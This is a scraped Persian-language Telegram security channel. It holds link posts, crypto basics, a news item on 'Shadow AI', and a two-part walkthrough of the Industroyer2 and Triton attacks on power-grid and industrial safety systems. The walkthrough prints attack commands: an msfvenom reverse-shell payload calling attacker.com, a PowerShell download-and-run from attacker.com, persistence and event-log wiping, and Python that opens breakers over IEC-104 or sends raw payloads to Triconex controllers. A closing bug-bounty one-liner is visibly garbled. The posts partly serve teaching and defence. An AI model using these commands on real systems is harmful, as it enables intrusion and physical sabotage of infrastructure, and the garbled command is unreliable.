🔵 پایگاه داده CVE: جستجوی CVExploits
جامع ترین پایگاه داده اطلاعات در مورد سوء استفاده های CVE از سراسر اینترنت.
⏺ لینک منبع
#Cybersecurity #infosec
@TryHackBox
@TryHackBoxOfficial
جامع ترین پایگاه داده اطلاعات در مورد سوء استفاده های CVE از سراسر اینترنت.
⏺ لینک منبع
#Cybersecurity #infosec
@TryHackBox
@TryHackBoxOfficial
👍3
🏹 سلاح های هکرهای وب
• مجموعه ای از ابزارهای جالب مورد استفاده هکرهای وب. هک مبارک، شکار حشرات مبارک.
• https://github.com/hahwul/WebHackersWeapons
#infosec
@TryHackBox
• مجموعه ای از ابزارهای جالب مورد استفاده هکرهای وب. هک مبارک، شکار حشرات مبارک.
• https://github.com/hahwul/WebHackersWeapons
#infosec
@TryHackBox
GitHub
GitHub - hahwul/WebHackersWeapons: ⚔️ Web Hacker's Weapons / A collection of cool tools used by Web hackers. Happy hacking , Happy…
⚔️ Web Hacker's Weapons / A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting - hahwul/WebHackersWeapons
👎3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
دستورات مهم لینوکس: برای تحلیلگر SOC توجه داشته باشید
#incedentresponse #redteam #infosec #SOC #linux
@TryHackBox
#incedentresponse #redteam #infosec #SOC #linux
@TryHackBox
👍3
🔖 بازگشت سایهی استاکسنت – قسمت اول
حمله واقعی به زیرساخت برق اوکراین با Industroyer2
💠 حمله پیشرفتهای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حملهای بزرگ و واقعی به زیرساخت برق اوکراین انجام داد. این حمله نسخهای ارتقایافته از بدافزار معروف استاکسنت بود که بهش لقب دادن:
این حمله بهقصد خاموشی گسترده و بیثباتی در مناطق حساس در اوکراین طراحی شده بود، دقیقاً همزمان با حملهی نظامی روسیه.
حالا تو این دو قسمت، این حمله رو در ۵ فاز عملیاتی بررسی میکنیم.
📌 فاز اول: شناسایی و جمعآوری اطلاعات از شبکه برق (ICS Recon)
هکرها قبل از حمله، با استفاده از ابزارها و تکنیکهای OSINT و دسترسی اولیه به شبکه، ساختار سیستم برق و نوع تجهیزات ICS رو شناسایی کردن.
🛠 ابزارهای مورد استفاده:
< — Shodan — >
پیدا کردن PLCها و HMIهای متصل به اینترنت
< — Wireshark — >
برای بررسی پروتکلهای صنعتی مثل IEC-104، Modbus, DNP3
< — Nmap — >
با اسکریپتهای مخصوص ICS
< — FOCA — >
برای جمعآوری متادیتای فایلهای منتشرشده توسط شرکت برق
< — Active Directory Enum — >
برای کشف سیستمهای مهندسی در شبکه داخلی
اسکن نمونه با Nmap:
استخراج اطلاعات PLC از ترافیک IEC-104 با Wireshark:
📌 فاز دوم: ورود به شبکه و اجرای اولیه بدافزار
گزارش CERT-UA نشون میده که Sandworm از حساب RDP یکی از مهندسین شبکه وارد سیستم شده و از طریق یک فایل آلوده بدافزار رو مستقر کرده.
🔶 روشهای ورود
سرقت رمز عبور از طریق فیشینگ یا Keylogger
استفاده از RDP Credentialهای لو رفته
اجرای فایل EXE مخرب با دسترسی SYSTEM
نمونه بدافزار ساختهشده با msfvenom:
ایجاد Persistence:
📌 فاز سوم: ارتباط مستقیم با PLC و تخریب زیرساخت
بدافزار Industroyer2 بهصورت مستقیم به PLCهای شبکه برق وصل میشه و با استفاده از پروتکل IEC-104 دستور باز یا بستهکردن بریکرها (Breaker) رو صادر میکنه.
🔶 ساختار عملکرد بدافزار:
- اتصال TCP به پورت 2404 (IEC-104)
- ارسال دستور Single Command برای باز کردن بریکر
- ارسال دستور Double Command برای شبیهسازی فرمان مهندسی قانونی
نمونه کد Python برای باز کردن Breaker:
فایل کانفیگ شبکه در بدافزار:
📌 فاز چهارم: پاکسازی ردپا و لاگها
بعد از اجرا، بدافزار تلاش میکنه ردپاهای خودش رو پاک کنه
دستورات استفادهشده:
📌 فاز پنجم: شناسایی حمله و مقابله توسط CERT-UA
مرکز پاسخ اضطراری اوکراین تونست حمله رو در لحظه آخر شناسایی کنه.
تحلیل نمونه Industroyer2 نشون داد که فقط روی سیستمهای خاص با تجهیزات SCADA فعال میشه.
با بررسی لاگهای شبکه و دسترسی مشکوک از RDP کشف و فایل EXE با نام جعلی update_driver.exe روی سیستم مهندسین دیده شد.
🔶 روشهای دفاعی پیشنهادی
- استفاده از ابزارهای تخصصی ICS مانند Nozomi و Dragos
- ایزولهکردن کامل سیستمهای SCADA و PLC از شبکه IT
- بررسی ترافیک پورت 2404 با Suricata/Zeek برای دستورات مشکوک
- تحلیل Signatureهای پروتکل IEC-104
📌 این حمله ادامهی استاکسنت بود؛ با دقت بیشتر، طراحی خاص برای اوکراین و قابلیت اجرای فرمان مستقیم روی شبکه برق. این حمله نشون داد که تو دنیای جنگهای مدرن، کلید برق یه کشور میتونه با یه packet خاموش بشه.
✍️نویسنده
@TryHackBox| Condor
#ICS #SCADA #CyberWarfare #APT #Industroyer #InfoSec
حمله واقعی به زیرساخت برق اوکراین با Industroyer2
💠 حمله پیشرفتهای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حملهای بزرگ و واقعی به زیرساخت برق اوکراین انجام داد. این حمله نسخهای ارتقایافته از بدافزار معروف استاکسنت بود که بهش لقب دادن:
Industroyer2
این حمله بهقصد خاموشی گسترده و بیثباتی در مناطق حساس در اوکراین طراحی شده بود، دقیقاً همزمان با حملهی نظامی روسیه.
حالا تو این دو قسمت، این حمله رو در ۵ فاز عملیاتی بررسی میکنیم.
📌 فاز اول: شناسایی و جمعآوری اطلاعات از شبکه برق (ICS Recon)
هکرها قبل از حمله، با استفاده از ابزارها و تکنیکهای OSINT و دسترسی اولیه به شبکه، ساختار سیستم برق و نوع تجهیزات ICS رو شناسایی کردن.
🛠 ابزارهای مورد استفاده:
< — Shodan — >
پیدا کردن PLCها و HMIهای متصل به اینترنت
< — Wireshark — >
برای بررسی پروتکلهای صنعتی مثل IEC-104، Modbus, DNP3
< — Nmap — >
با اسکریپتهای مخصوص ICS
< — FOCA — >
برای جمعآوری متادیتای فایلهای منتشرشده توسط شرکت برق
< — Active Directory Enum — >
برای کشف سیستمهای مهندسی در شبکه داخلی
اسکن نمونه با Nmap:
nmap -sS -p 2404 --script=modbus-discover 10.10.0.0/16
استخراج اطلاعات PLC از ترافیک IEC-104 با Wireshark:
iec104.asdu.typeid == 45 || iec104.asdu.typeid == 46 📌 فاز دوم: ورود به شبکه و اجرای اولیه بدافزار
گزارش CERT-UA نشون میده که Sandworm از حساب RDP یکی از مهندسین شبکه وارد سیستم شده و از طریق یک فایل آلوده بدافزار رو مستقر کرده.
🔶 روشهای ورود
سرقت رمز عبور از طریق فیشینگ یا Keylogger
استفاده از RDP Credentialهای لو رفته
اجرای فایل EXE مخرب با دسترسی SYSTEM
نمونه بدافزار ساختهشده با msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > industroyer2.exe ایجاد Persistence:
schtasks /create /tn "SCADA Sync" /tr "C:\ProgramData\industroyer2.exe" /sc onlogon /ru SYSTEM
📌 فاز سوم: ارتباط مستقیم با PLC و تخریب زیرساخت
بدافزار Industroyer2 بهصورت مستقیم به PLCهای شبکه برق وصل میشه و با استفاده از پروتکل IEC-104 دستور باز یا بستهکردن بریکرها (Breaker) رو صادر میکنه.
🔶 ساختار عملکرد بدافزار:
- اتصال TCP به پورت 2404 (IEC-104)
- ارسال دستور Single Command برای باز کردن بریکر
- ارسال دستور Double Command برای شبیهسازی فرمان مهندسی قانونی
نمونه کد Python برای باز کردن Breaker:
from iec104 import IEC104Client client = IEC104Client("10.0.0.12", 2404) client.connect()
Cause = Spontaneous client.send_command(asdu_type=45, ioa=101, value=0) # breaker open client.disconnect() فایل کانفیگ شبکه در بدافزار:
{ "targets": [ {"ip": "10.0.0.12", "type": "siemens", "breaker_id": 101}, {"ip": "10.0.0.15", "type": "schneider", "breaker_id": 110} ], "payload_type": "iec104", "command": "breaker_open" } 📌 فاز چهارم: پاکسازی ردپا و لاگها
بعد از اجرا، بدافزار تلاش میکنه ردپاهای خودش رو پاک کنه
دستورات استفادهشده:
wevtutil cl System wevtutil cl Application Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force
📌 فاز پنجم: شناسایی حمله و مقابله توسط CERT-UA
مرکز پاسخ اضطراری اوکراین تونست حمله رو در لحظه آخر شناسایی کنه.
تحلیل نمونه Industroyer2 نشون داد که فقط روی سیستمهای خاص با تجهیزات SCADA فعال میشه.
با بررسی لاگهای شبکه و دسترسی مشکوک از RDP کشف و فایل EXE با نام جعلی update_driver.exe روی سیستم مهندسین دیده شد.
🔶 روشهای دفاعی پیشنهادی
- استفاده از ابزارهای تخصصی ICS مانند Nozomi و Dragos
- ایزولهکردن کامل سیستمهای SCADA و PLC از شبکه IT
- بررسی ترافیک پورت 2404 با Suricata/Zeek برای دستورات مشکوک
- تحلیل Signatureهای پروتکل IEC-104
📌 این حمله ادامهی استاکسنت بود؛ با دقت بیشتر، طراحی خاص برای اوکراین و قابلیت اجرای فرمان مستقیم روی شبکه برق. این حمله نشون داد که تو دنیای جنگهای مدرن، کلید برق یه کشور میتونه با یه packet خاموش بشه.
✍️نویسنده
@TryHackBox| Condor
#ICS #SCADA #CyberWarfare #APT #Industroyer #InfoSec
👍8❤5
Try Hack Box
🔖 بازگشت سایهی استاکسنت – قسمت اول حمله واقعی به زیرساخت برق اوکراین با Industroyer2 💠 حمله پیشرفتهای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حملهای بزرگ و واقعی…
🔖بازگشت سایهی استاکسنت – قسمت دوم
بدافزاری که سیستمهای ایمنی صنعتی (SIS) رو هدف گرفت
💠 حمله واقعی به تأسیسات پتروشیمی و نیروگاهها با هدف ایجاد فاجعه انسانی
📌 فاز اول: شناخت سیستمهای SIS و آسیبپذیریها
سیستمهای SIS (Safety Instrumented Systems) وظیفه قطع خودکار و فوری عملیات خطرناک در کارخانهها و نیروگاهها رو دارند تا از وقوع انفجار یا نشت مواد سمی جلوگیری کنند. Triton طوری طراحی شده که این سیستمها رو خاموش کنه یا کنترلشون رو بدست بگیره.
💻 سیستمهای هدف:
Triconex SIS ساخت Schneider Electric
PLCهای خاص با دسترسی شبکه به پورت 18245
📌 فاز دوم: نفوذ به شبکه ICS و نصب بدافزار
گزارش FireEye نشون داده که مهاجمها ابتدا به شبکه IT نفوذ کردند و از اونجا به شبکه کنترل صنعتی نفوذ کردند. بعد با استفاده از دسترسیهای RDP یا VPN غیرمجاز، بدافزار Triton رو روی سرور مهندسی نصب کردند.
نمونه دستورات نصب بدافزار:
📌 فاز سوم: ارتباط مستقیم با PLCهای Triconex و تغییر عملکرد
بدافزار با استفاده از پروتکل اختصاصی Triconex، با PLCهای SIS ارتباط برقرار میکنه و کدهای امنیتی رو تغییر میده یا کاملاً سیستم رو از کار میاندازه.
نمونه کد بازسازیشده (Pseudo Python):
📌فاز چهارم: ایجاد خاموشی و نابودی عملکرد ایمنی
با اجرای فرمانهای بدافزار، سیستمهای ایمنی به حالت Fail-safe نمیرن بلکه خاموش میشن، این یعنی حتی اگر خطری وجود داشته باشه، سیستم به وظیفهاش عمل نمیکنه و باعث حادثه بزرگ میشه.
فاز پنجم: پاکسازی ردپا و استتار
توطئهگران ردپای خود را با حذف لاگها و بازنویسی تاریخچه فرمانها پاک کردند.
دستورات پاکسازی:
🔶 روشهای مقابله و پیشگیری
- پیادهسازی فیلترهای دقیق در فایروالهای صنعتی
- نظارت بر ترافیک پورت 18245 و تشخیص رفتارهای غیرمعمول
- آموزش کارکنان به ویژه مهندسین شبکه برای جلوگیری از فیشینگ
- استفاده از سیستمهای IDS/IPS تخصصی برای ICS
- ایزولهسازی شبکه کنترل صنعتی از شبکه عمومی و اینترنت
📌 بدافزار Triton یک هشدار جدی به صنایع حساس و زیرساختهای حیاتی جهان است که حملههای سایبری میتوانند به قیمت جان انسانها تمام شوند. کنترل سیستمهای ایمنی صنعتی دیگر یک گزینه نیست، یک ضرورت حیاتی است.
✍️نویسنده
@TryHackBox| Condor
#ICS #SCADA #CyberWarfare #APT #Triton #InfoSec
بدافزاری که سیستمهای ایمنی صنعتی (SIS) رو هدف گرفت
💠 حمله واقعی به تأسیسات پتروشیمی و نیروگاهها با هدف ایجاد فاجعه انسانی
📌 فاز اول: شناخت سیستمهای SIS و آسیبپذیریها
سیستمهای SIS (Safety Instrumented Systems) وظیفه قطع خودکار و فوری عملیات خطرناک در کارخانهها و نیروگاهها رو دارند تا از وقوع انفجار یا نشت مواد سمی جلوگیری کنند. Triton طوری طراحی شده که این سیستمها رو خاموش کنه یا کنترلشون رو بدست بگیره.
💻 سیستمهای هدف:
Triconex SIS ساخت Schneider Electric
PLCهای خاص با دسترسی شبکه به پورت 18245
📌 فاز دوم: نفوذ به شبکه ICS و نصب بدافزار
گزارش FireEye نشون داده که مهاجمها ابتدا به شبکه IT نفوذ کردند و از اونجا به شبکه کنترل صنعتی نفوذ کردند. بعد با استفاده از دسترسیهای RDP یا VPN غیرمجاز، بدافزار Triton رو روی سرور مهندسی نصب کردند.
نمونه دستورات نصب بدافزار:
Invoke-WebRequest -Uri https://attacker.com/triton.exe -OutFile C:\Windows\Temp\triton.exe Start-Process -FilePath C:\Windows\Temp\triton.exe
📌 فاز سوم: ارتباط مستقیم با PLCهای Triconex و تغییر عملکرد
بدافزار با استفاده از پروتکل اختصاصی Triconex، با PLCهای SIS ارتباط برقرار میکنه و کدهای امنیتی رو تغییر میده یا کاملاً سیستم رو از کار میاندازه.
نمونه کد بازسازیشده (Pseudo Python):
import socket def send_triton_cmd(ip, port, payload): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(payload) response = s.recv(1024) s.close() return response
payload = b'\x01\x03\x00\x00\x00\x06\xC5\xCD'
response = send_triton_cmd("10.10.10.5", 18245, payload) print("Response:", response)
📌فاز چهارم: ایجاد خاموشی و نابودی عملکرد ایمنی
با اجرای فرمانهای بدافزار، سیستمهای ایمنی به حالت Fail-safe نمیرن بلکه خاموش میشن، این یعنی حتی اگر خطری وجود داشته باشه، سیستم به وظیفهاش عمل نمیکنه و باعث حادثه بزرگ میشه.
فاز پنجم: پاکسازی ردپا و استتار
توطئهگران ردپای خود را با حذف لاگها و بازنویسی تاریخچه فرمانها پاک کردند.
دستورات پاکسازی:
wevtutil cl Security wevtutil cl System Clear-EventLog -LogName "Application"
🔶 روشهای مقابله و پیشگیری
- پیادهسازی فیلترهای دقیق در فایروالهای صنعتی
- نظارت بر ترافیک پورت 18245 و تشخیص رفتارهای غیرمعمول
- آموزش کارکنان به ویژه مهندسین شبکه برای جلوگیری از فیشینگ
- استفاده از سیستمهای IDS/IPS تخصصی برای ICS
- ایزولهسازی شبکه کنترل صنعتی از شبکه عمومی و اینترنت
📌 بدافزار Triton یک هشدار جدی به صنایع حساس و زیرساختهای حیاتی جهان است که حملههای سایبری میتوانند به قیمت جان انسانها تمام شوند. کنترل سیستمهای ایمنی صنعتی دیگر یک گزینه نیست، یک ضرورت حیاتی است.
✍️نویسنده
@TryHackBox| Condor
#ICS #SCADA #CyberWarfare #APT #Triton #InfoSec
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
👍5❤2
🚨 ۹۵٪ از شرکتهای آمریکایی از هوش مصنوعی مولد (Generative AI) استفاده میکنند — اغلب بدون اطلاع تیم IT!
🧠 ابزارهای هوش مصنوعی مثل ChatGPT، Gemini، Copilot و Claude در حال حاضر در اکثر شرکتها مورد استفاده قرار میگیرند. اما مشکل کجاست؟
📤 دادههای حساس شامل اطلاعات مشتری، کد منبع، قراردادها و حتی اطلاعات مالی بدون هیچ نظارت یا محدودیتی وارد این ابزارها میشوند.
⚠️ این پدیده جدید به نام "Shadow AI" شناخته میشود:
استفاده پنهانی از هوش مصنوعی توسط کارمندان، بدون هماهنگی با واحد IT یا امنیت.
📚 منبع اصلی خبر:
The Hacker News – Shadow AI in 2025
✍️نویسنده
@TryHackBox | TheChaos
#ShadowAI #AIsecurity #DataPrivacy #GenerativeAI #CyberSecurity #AIThreats #GPT #InfoSec #News
🧠 ابزارهای هوش مصنوعی مثل ChatGPT، Gemini، Copilot و Claude در حال حاضر در اکثر شرکتها مورد استفاده قرار میگیرند. اما مشکل کجاست؟
📤 دادههای حساس شامل اطلاعات مشتری، کد منبع، قراردادها و حتی اطلاعات مالی بدون هیچ نظارت یا محدودیتی وارد این ابزارها میشوند.
⚠️ این پدیده جدید به نام "Shadow AI" شناخته میشود:
استفاده پنهانی از هوش مصنوعی توسط کارمندان، بدون هماهنگی با واحد IT یا امنیت.
📚 منبع اصلی خبر:
The Hacker News – Shadow AI in 2025
✍️نویسنده
@TryHackBox | TheChaos
#ShadowAI #AIsecurity #DataPrivacy #GenerativeAI #CyberSecurity #AIThreats #GPT #InfoSec #News
❤8
📄 متن ساده - دادههای اصلی قابل خواندن، بدون محافظت.
🔤 رمزگذاری - دادهها را برای انتقال تبدیل میکند، نه برای امنیت. به راحتی قابل برگشت است.
#️⃣ هشینگ - فرآیند یک طرفه، خروجی با اندازه ثابت، ایدهآل برای بررسی یکپارچگی دادهها.
🔑 رمزگذاری - محافظت دو طرفه، قابل برگشت با یک کلید، محرمانگی را تضمین میکند.
✍️نویسنده
@TryHackBox | The Chaos
#CyberSecurity #DataProtection #Encryption #Hashing #InfoSec
🔤 رمزگذاری - دادهها را برای انتقال تبدیل میکند، نه برای امنیت. به راحتی قابل برگشت است.
#️⃣ هشینگ - فرآیند یک طرفه، خروجی با اندازه ثابت، ایدهآل برای بررسی یکپارچگی دادهها.
🔑 رمزگذاری - محافظت دو طرفه، قابل برگشت با یک کلید، محرمانگی را تضمین میکند.
✍️نویسنده
@TryHackBox | The Chaos
#CyberSecurity #DataProtection #Encryption #Hashing #InfoSec
❤5
اهمیت و انواع محافظت از داده در Infosec 🔐
📄 Plaintext — متن خام
دادههایی که مستقیماً قابلخواندناند؛ هیچ محافظتی ندارند و در صورت لو رفتن، همهچیز آشکار میشود.
💥 وقتی ناامن منتقل یا ذخیره شوند، سریع به نقطه ضعف تبدیل میشوند.
🔤 Encoding — تبدیل فرمت
دادهها برای انتقال یا نمایش به فرمت دیگری تبدیل میشوند (مثلاً Base64). فرآیند برگشتپذیر و برای ذخیرهسازی امن طراحی نشده و فقط برای سازگاری یا فشردهسازی مفیده.
#️⃣ Hashing — یکطرفه و برای یکپارچگی
تبدیل داده به خروجی با اندازهٔ ثابت (مثلاً SHA-256).
غیرقابلبرگشت (ideally)، بنابراین برای ذخیرهٔ پسورد بهصورت تنها استفاده میشود همراه با نمک (salt).
بهترین کاربرد: بررسی یکپارچگی فایلها، ذخیرهٔ امن پسورد همراه با salt+pepper، و تشخیص تغییر غیرمجاز.
🔑 Encryption — رمزنگاری دوطرفه
دادهها با الگوریتم و کلید رمز میشوند و فقط با کلید مناسب قابل بازگشتاند.
انواع: رمز متقارن (AES) و نامتقارن (RSA, ECC).
کاربردها: انتقال امن (TLS/HTTPS)، ذخیرهٔ امن دادههای حساس، رمزگذاری دیسک.
✅ چکلیست عملی (Best Practices):
همیشه از پروتکلهای امن مثل HTTPS استفاده کنید.
برای پسوردها از هشهای مدرن + salt استفاده کنید (و از الگوریتمهای منسوخ مثل MD5/SHA-1 پرهیز کنید).
کلیدها را ایمن نگهدارید (مدیریت کلید، rotation، دسترسی محدود).
لاگها و بکاپها را هم رمزنگاری کنید.
اصل حداقل دسترسی (Least Privilege) را رعایت کنید.
مانیتورینگ و بررسی یکپارچگی دادهها را فعال نگهدارید.
✍️نویسنده
@TryHackBox | The Chaos
#CyberSecurity #DataProtection #Encryption #Hashing #InfoSec
📄 Plaintext — متن خام
دادههایی که مستقیماً قابلخواندناند؛ هیچ محافظتی ندارند و در صورت لو رفتن، همهچیز آشکار میشود.
💥 وقتی ناامن منتقل یا ذخیره شوند، سریع به نقطه ضعف تبدیل میشوند.
🔤 Encoding — تبدیل فرمت
دادهها برای انتقال یا نمایش به فرمت دیگری تبدیل میشوند (مثلاً Base64). فرآیند برگشتپذیر و برای ذخیرهسازی امن طراحی نشده و فقط برای سازگاری یا فشردهسازی مفیده.
#️⃣ Hashing — یکطرفه و برای یکپارچگی
تبدیل داده به خروجی با اندازهٔ ثابت (مثلاً SHA-256).
غیرقابلبرگشت (ideally)، بنابراین برای ذخیرهٔ پسورد بهصورت تنها استفاده میشود همراه با نمک (salt).
بهترین کاربرد: بررسی یکپارچگی فایلها، ذخیرهٔ امن پسورد همراه با salt+pepper، و تشخیص تغییر غیرمجاز.
🔑 Encryption — رمزنگاری دوطرفه
دادهها با الگوریتم و کلید رمز میشوند و فقط با کلید مناسب قابل بازگشتاند.
انواع: رمز متقارن (AES) و نامتقارن (RSA, ECC).
کاربردها: انتقال امن (TLS/HTTPS)، ذخیرهٔ امن دادههای حساس، رمزگذاری دیسک.
✅ چکلیست عملی (Best Practices):
همیشه از پروتکلهای امن مثل HTTPS استفاده کنید.
برای پسوردها از هشهای مدرن + salt استفاده کنید (و از الگوریتمهای منسوخ مثل MD5/SHA-1 پرهیز کنید).
کلیدها را ایمن نگهدارید (مدیریت کلید، rotation، دسترسی محدود).
لاگها و بکاپها را هم رمزنگاری کنید.
اصل حداقل دسترسی (Least Privilege) را رعایت کنید.
مانیتورینگ و بررسی یکپارچگی دادهها را فعال نگهدارید.
✍️نویسنده
@TryHackBox | The Chaos
#CyberSecurity #DataProtection #Encryption #Hashing #InfoSec
❤5
تمام اندپوینت ها را از یک فایل JS استخراج کنید و باگ خود را بگیرید .
- متد اول
waybackurls HOSTS | tac | sed "s#\\\\/\/#\\/\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '\/'
'{if(length($2))print "https:\/\/"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s\/[;}\)>]\/\n\/g\" | grep -Po \" (L'1|\"](https?: )?[\/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['\"](https?:)?[\/1{1,2}[^' \"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- متد دوم
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\\/[a-zA-Z0-9?&=\\/\-#.](?= (\"||'|'))" | sort -u | tee JS.txt
@TryHackBox
#باگ_بانتی
#infosec #cybersec #bugbountytips
- متد اول
waybackurls HOSTS | tac | sed "s#\\\\/\/#\\/\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '\/'
'{if(length($2))print "https:\/\/"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s\/[;}\)>]\/\n\/g\" | grep -Po \" (L'1|\"](https?: )?[\/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- متد دوم
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\\/[a-zA-Z0-9?&=\\/\-#.](?= (\"||'|'))" | sort -u | tee JS.txt
@TryHackBox
#باگ_بانتی
#infosec #cybersec #bugbountytips
🔥7❤4👍1